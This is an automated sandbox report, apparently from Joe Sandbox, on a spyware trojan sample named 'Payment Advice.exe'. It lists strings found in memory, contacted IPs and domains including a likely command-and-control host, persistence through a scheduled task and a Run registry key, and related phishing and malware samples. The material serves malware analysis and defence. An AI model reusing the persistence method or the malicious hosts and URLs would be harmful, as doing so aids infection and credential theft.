00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://x1.c.lencr.org/0Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://x1.i.lencr.org/0Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://r3.o.lencr.org0Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/DPleasePayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers8Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fonts.comPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.sandoll.co.krPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.urwpp.deDPleasePayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.zhongyicts.com.cnPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Advice.exe, 00000000.00000002.1710843743.000000000318F000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1756192021.000000000336F000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1849213275.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1931578848.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.sakkal.comPayment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.26.13.205
                                                                      		api.ipify.orgUnited States
                                                                      		13335CLOUDFLARENETUSfalse
                                                                      94.100.26.91
                                                                      		seawaysfreight-bd.comNetherlands
                                                                      		29802HVC-ASUSfalse

                                                                      General Information

                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1428252
                                                                      Start date and time:2024-04-18 18:25:07 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 12m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:27
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Payment Advice.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@33/20@2/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 96%
                                                                      • Number of executed functions: 423
                                                                      • Number of non-executed functions: 34
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: Payment Advice.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      17:26:01Task SchedulerRun new task: sFPEKzHsLkYZIz path: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                      17:26:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                      17:26:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BjTxJte C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                      18:25:58API Interceptor5006474x Sleep call for process: Payment Advice.exe modified
                                                                      18:26:00API Interceptor35x Sleep call for process: powershell.exe modified
                                                                      18:26:04API Interceptor489671x Sleep call for process: sFPEKzHsLkYZIz.exe modified
                                                                      18:26:14API Interceptor8015528x Sleep call for process: BjTxJte.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                                      • api.ipify.org/
                                                                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                                      • api.ipify.org/?format=json
                                                                      ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                                      • api.ipify.org/?format=json
                                                                      Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/?format=json
                                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                                      • api.ipify.org/
                                                                      SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                                      • api.ipify.org/
                                                                      94.100.26.91PO00221.exeGet hashmaliciousAgentTeslaBrowse
                                                                        FEB-MAR SOA 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                          FEB-MAR SOA 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                            SOA FEB 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                                              SOA JAN 2024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                PO 00223.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.28563.21605.exeGet hashmaliciousAgentTeslaBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    api.ipify.orgRFQ Img_Quotation PO 202400969 - HESSEN TECH_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    order 4500381478001.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    Scan-IMG PO Order CW289170-A CW201.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    TransactionSummary_910020049836765_110424045239.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    PRODUCT LIST_002673CC1F68.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    WZM.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                    • 104.26.12.205
                                                                                    hesaphareketi_1.SCR.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    DHL 0028374.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.12.205
                                                                                    p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    Order Details and Specifications.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 104.26.12.205

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSRFQ Img_Quotation PO 202400969 - HESSEN TECH_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    https://huntingtonoakmont-my.sharepoint.com/:b:/g/personal/cmariotti_oakmontcommunities_com/EeUv57weU1BKhs36H3rF_G0BHM4kTzJShI_ZPwFvp1P7-g?e=4UASJ5Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    Nexpoint-annual-staff-promotion-and-benefits_KDV-791358.docxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.63.140
                                                                                    Nexpoint-annual-staff-promotion-and-benefits_KDV-791358.docxGet hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.25.14
                                                                                    SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                                                                    • 104.21.84.67
                                                                                    https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499faGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.64.14
                                                                                    http://wechatunsuscribe.secure.force.comGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    notepad.txtGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 1.1.1.1
                                                                                    https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FC2educate/aEFQv26188aEFQv26188aEFQv/anVsaWUubG9uZ2lub0BjMmVkdWNhdGUuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.17.2.184
                                                                                    HVC-ASUShttps://freesnippingtool.com/Get hashmaliciousUnknownBrowse
                                                                                    • 23.111.140.234
                                                                                    Credit_Details21367163050417024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 107.155.77.34
                                                                                    RFQ183494.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                    • 107.155.77.34
                                                                                    setup.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 23.227.196.172
                                                                                    cf9dPUbn3C.exeGet hashmaliciousRemcosBrowse
                                                                                    • 45.74.19.121
                                                                                    3hHHxU2r9a.exeGet hashmaliciousRemcosBrowse
                                                                                    • 45.74.19.121
                                                                                    April_2024_discount_Voucher-Unique-d-File.cmdGet hashmaliciousUnknownBrowse
                                                                                    • 45.74.19.121
                                                                                    https://chorus-syncguitar.uk.nf/Get hashmaliciousTechSupportScamBrowse
                                                                                    • 91.208.16.159
                                                                                    http://www.theorlandotimesnewspaper.comGet hashmaliciousUnknownBrowse
                                                                                    • 104.254.130.154
                                                                                    AprilDiscountVoucher.exeGet hashmaliciousQuasarBrowse
                                                                                    • 45.74.19.121

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0eRFQ Img_Quotation PO 202400969 - HESSEN TECH_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    SA162.pdf.download.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205
                                                                                    https://wechatunsuscribe.secure.force.com/Get hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205
                                                                                    https://t.airgears.org/r/?resource=120958450/4d9ac80/2a1170&e=dYRtX3NhcXBhbXduQUFjYW4kb26DYXK0LWQzJnV0bW9zb3WyY3V9YWNkJnV1bV9uAWRpdZ09ZW1ibWwmd39udW09OUT3MTNwMzQzMUYmd391cj0zJm1pX4U9eW5kZWApbmVlJmNpZD2yYURNNzV0NDgmYnlkPUE2MjBzN&ref_=1wy&ref=98k/&u=4jj4/&eid=xekc6v/DU5MjEnc2VoY29lZT11cmRlZnluZWQ&s=obI3r-q7de3Me3nnN3cpKfiix7CULJmXF7FuunFtjSxGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205
                                                                                    ueworoejvdvhruthqq3.exeGet hashmaliciousPatchworkBrowse
                                                                                    • 104.26.13.205
                                                                                    ueworoejvdvhruthqq3.exeGet hashmaliciousPatchworkBrowse
                                                                                    • 104.26.13.205
                                                                                    order 4500381478001.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    Scan-IMG PO Order CW289170-A CW201.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.26.13.205
                                                                                    http://Doggygangers.com/YfMv2QsjpCQl845BWSYNfNOQitweyze_Z6lIlrRr43MRjX_HrM/get_download_file_name.phpGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205
                                                                                    _Contrato_E2024A493865_PDF.jsGet hashmaliciousUnknownBrowse
                                                                                    • 104.26.13.205

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BjTxJte.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):2056
                                                                                    Entropy (8bit):5.342567089024067
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                    MD5:83A6E29FD802325CCCB720870B60C618
                                                                                    SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                    SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                    SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Advice.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):2056
                                                                                    Entropy (8bit):5.342567089024067
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                    MD5:83A6E29FD802325CCCB720870B60C618
                                                                                    SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                    SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                    SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sFPEKzHsLkYZIz.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):2056
                                                                                    Entropy (8bit):5.342567089024067
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHKHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwqRb
                                                                                    MD5:83A6E29FD802325CCCB720870B60C618
                                                                                    SHA1:4CD8AC6CA2659E4E32D1B27A8A4E77ABF980EE43
                                                                                    SHA-256:A81A5B984180553C06E7C9CAE0BAF7E195950801F493996F48FA59F1ACC135B2
                                                                                    SHA-512:69CC81145ACCA3D5C154D3A11396C2AFAEC4135662A82124EA249817BE7066D782DE2C79FE985E23F32F9709C144E2C513C727CFD1A88D677F34EB25E868B560
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2232
                                                                                    Entropy (8bit):5.379553825721504
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:RWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeoM0Uyus:RLHxvCsIfA2KRHmOugU1s
                                                                                    MD5:CE7A29F24F012D1D5897D46340FBEA84
                                                                                    SHA1:DD109C4F3AB8581C65AA89C0EC3A8D025CDA6A78
                                                                                    SHA-256:8F979257E13783331F59E9AE8392784DB4A26F541FA01AADAACB5219FBD232CA
                                                                                    SHA-512:090891F557B6CC285FF3644B12056A36BBC1E5977D2A8ED4E735C8D01FE13689972885B3615136013A0E44D1BF6AC01546F210A310462D28AED7FA8A8816269F
                                                                                    Malicious:false
